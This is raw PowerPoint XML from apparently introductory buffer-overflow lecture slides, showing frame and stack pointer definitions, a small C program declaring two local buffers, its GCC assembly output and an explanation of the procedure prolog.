              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>9</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u="none" dirty="0"/>
              <a:t>FP: Frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" u="none" baseline="0" dirty="0"/>
              <a:t> Pointer that points to the current stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" u="none" baseline="0" dirty="0"/>
              <a:t>SP: Stack Pointer that points to the top of the stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" u="none" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>example1.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>void function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> b, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> c) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>   char buffer1[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>   char buffer2[10];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>void main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  function(1,2,3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>example1.s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.file	"example1.c"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.version	"01.01"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>gcc2_compiled.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.align 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.type	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>function,@function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>function:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $20,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.L1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.Lfe1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.size	 function,.Lfe1-function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.align 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.type	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>main,@function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	call function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>addl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $12,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.L2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>.Lfe2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.size	 main,.Lfe2-main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>	.ident	"GCC: (GNU) egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501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EFB88A6C-31DA-44ED-A7B1-AE2837CEF8A7}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>10</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a:t>void function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> b, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> c) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>   char buffer1[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>   char buffer2[10];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> $20, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5120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2849CC1-2436-49BD-9703-D2B6C776ECD1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>11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0145BBD5-C299-4960-9E11-1A9FA7AB86C2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257629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89A49341-23E5-4418-88F0-C02D93FEE7FF}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="886688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228600"/>
            <a:ext cx="196215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28600"/>
            <a:ext cx="57340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FC8D7C47-A22C-4B1C-9DF2-EFF94C1A14BF}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213374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631889EB-A148-44C4-BCE4-6EB882987376}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43120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882957A2-36AC-44DD-BCC6-AF6187247EDA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4286786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2681A732-9BF2-4514-A7DC-EC2E24632EB9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="740445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fld id="{FCEE274B-E35F-4283-BF94-ED5B5CC1942F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2981251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fld id="{BE8149B2-8D1E-4DEA-AB0A-24C25A57CAB4}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="554819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fld id="{6741AABC-25BA-4ACB-B48F-07D1638E0155}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4219559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AA56B97B-1E56-4DD0-9063-89D35FFA1498}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2673402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CF7A7553-F861-4D8F-A3C7-C82F2058679E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2632396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09600" y="228600"/>
            <a:ext cx="7772400" cy="1143000"/>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Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="15240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3076" name="Rectangle 4"/>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a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3077"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defRPr sz="1400">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3078" name="Rectangle 6"/>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a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{02E12040-6378-4A60-873E-EA69E997350A}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">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5pPr>
      <a:lvl6pPr marL="4572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6pPr>
      <a:lvl7pPr marL="9144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7pPr>
      <a:lvl8pPr marL="13716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8pPr>
      <a:lvl9pPr marL="1828800"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7.wmf"/><Relationship Id="rId4"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8.wmf"/><Relationship Id="rId4"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9.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject10.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0.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject11.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notesSlide" Target="../notesSlides/notesSlide6.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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/><Relationship Id="rId9"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a:xfrm>
            <a:off x="685800" y="2286000"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Buffer Overflow (Part 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0F9A0BAB-BF42-4AAD-9067-7D2FF9714AA5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="533400"/>
            <a:ext cx="7772400" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Procedure prolog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>   $20,  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Pushes the old FP onto the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
